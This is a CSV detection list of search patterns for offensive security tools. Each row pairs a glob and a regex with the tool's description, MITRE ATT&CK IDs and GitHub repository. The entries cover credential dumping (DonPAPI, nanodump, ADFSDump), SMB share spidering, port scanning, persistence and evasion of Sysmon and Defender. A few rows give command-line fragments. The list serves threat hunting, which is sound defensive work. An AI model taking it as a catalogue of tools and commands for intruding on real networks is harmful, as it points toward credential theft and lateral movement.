"*man_spider.manspider:main*",".{0,1000}man_spider\.manspider\:main.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manage/reflective_dll_inject*",".{0,1000}manage\/reflective_dll_inject.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*ManagedEasyHook.dll*",".{0,1000}ManagedEasyHook\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*manageengine_adselfservice_plus_cve_2022_28810.*",".{0,1000}manageengine_adselfservice_plus_cve_2022_28810\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*manageengine_xnode/CVE*",".{0,1000}manageengine_xnode\/CVE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*manager/keepass.py*",".{0,1000}manager\/keepass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*manager/mRemoteNG.py*",".{0,1000}manager\/mRemoteNG\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*mandiant/ADFSDump*",".{0,1000}mandiant\/ADFSDump.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*mandiant/ccmpwn*",".{0,1000}mandiant\/ccmpwn.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","1","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*mandiant/DueDLLigence*",".{0,1000}mandiant\/DueDLLigence.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","462","88","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*mandiant/gocrack*",".{0,1000}mandiant\/gocrack.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*mandiant/msi-search*",".{0,1000}mandiant\/msi\-search.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*mandiant/SharPersist*",".{0,1000}mandiant\/SharPersist.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","1","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*mandllinject *",".{0,1000}mandllinject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","0","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*manspider * -d * -u * -p *",".{0,1000}manspider\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider */24 -f *",".{0,1000}manspider\s.{0,1000}\/24\s\-f\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider --threads * -d * -u * -H * --content admin*",".{0,1000}manspider\s\-\-threads\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}\s\-\-content\sadmin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*manspider*--loot-dir*",".{0,1000}manspider.{0,1000}\-\-loot\-dir.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider*--sharenames*",".{0,1000}manspider.{0,1000}\-\-sharenames.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider.py*",".{0,1000}manspider\.py.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider.spiderling*",".{0,1000}manspider\.spiderling.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*manspider_scan*",".{0,1000}manspider_scan.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*MANSPIDER-master*",".{0,1000}MANSPIDER\-master.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*map_payload_dll*",".{0,1000}map_payload_dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*map-get-tls-alternative-names *",".{0,1000}map\-get\-tls\-alternative\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*mapper_cve_exploit.py*",".{0,1000}mapper_cve_exploit\.py.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*masky_dump*",".{0,1000}masky_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*masscan -c *",".{0,1000}masscan\s\-c\s.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan failed with error: *",".{0,1000}masscan\sfailed\swith\serror\:\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*masscan --nmap*",".{0,1000}masscan\s\-\-nmap.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan -p*",".{0,1000}masscan\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan* -p*",".{0,1000}masscan.{0,1000}\s\s\-p.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*masscan.exe *",".{0,1000}masscan\.exe .{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*massdns -r *.txt*",".{0,1000}massdns\s\-r\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*master/bootkit/src*",".{0,1000}master\/bootkit\/src.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*master/EncryptedZIP*",".{0,1000}master\/EncryptedZIP.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*master/HookDetector*",".{0,1000}master\/HookDetector.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*master/ImplantSSP/*",".{0,1000}master\/ImplantSSP\/.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*master/SwampThing*",".{0,1000}master\/SwampThing.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*master/UnquotedPath*",".{0,1000}master\/UnquotedPath.{0,1000}","offensive_tool_keyword","UnquotedPath","Outputs a list of unquoted service paths that aren't in System32/SysWow64 to plant a PE into","T1543.003 - T1036.005 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/UnquotedPath","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*MatheuZSecurity/D3m0n1z3dShell*",".{0,1000}MatheuZSecurity\/D3m0n1z3dShell.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","1","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*matterpreter*",".{0,1000}matterpreter.{0,1000}","offensive_tool_keyword","Github Username","github username hosting offensive tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/matterpreter","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*matterpreter/DefenderCheck*",".{0,1000}matterpreter\/DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*matterpreter/Shhmon*",".{0,1000}matterpreter\/Shhmon.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*MattKeeley/Spoofy*",".{0,1000}MattKeeley\/Spoofy.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*MayankPandey01/Jira-Lens*",".{0,1000}MayankPandey01\/Jira\-Lens.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*Mazars-Tech/AD_Miner*",".{0,1000}Mazars\-Tech\/AD_Miner.{0,1000}","offensive_tool_keyword","AD_Miner","AD Miner is an Active Directory audit tool that leverages cypher queries to crunch data from the #Bloodhound graph database to uncover security weaknesses","T1087.002 - T1069 - T1018 - T1595","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/Mazars-Tech/AD_Miner","1","1","AD Enumeration","7","9","808","82","2024-04-17T15:57:37Z","2023-09-26T12:36:59Z" "*mbrg/power-pwn*",".{0,1000}mbrg\/power\-pwn.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*mcafee_epo2john.py*",".{0,1000}mcafee_epo2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*McpManagementPotato.*",".{0,1000}McpManagementPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*md c:\chaos-container*",".{0,1000}md\sc\:\\chaos\-container.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*Md4-128.unverified.test-vectors.txt*",".{0,1000}Md4\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Md5-128.unverified.test-vectors.txt*",".{0,1000}Md5\-128\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*mDNSSpoofer*",".{0,1000}mDNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*mdornseif/DeNiSe*",".{0,1000}mdornseif\/DeNiSe.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*MDSDLL_x64.dll*",".{0,1000}MDSDLL_x64\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MDSDLL_x86.dll*",".{0,1000}MDSDLL_x86\.dll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*mdsecactivebreach*",".{0,1000}mdsecactivebreach.{0,1000}","offensive_tool_keyword","Github Username","MDSecs ActiveBreach Team. own a github repo with lots of exploitation tools https://www.mdsec.co.uk/services/red-teaming/","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*mdsecactivebreach/CACTUSTORCH*",".{0,1000}mdsecactivebreach\/CACTUSTORCH.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","1","N/A","10","10","988","223","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" "*mdsecactivebreach/DragonCastle*",".{0,1000}mdsecactivebreach\/DragonCastle.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","1","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" 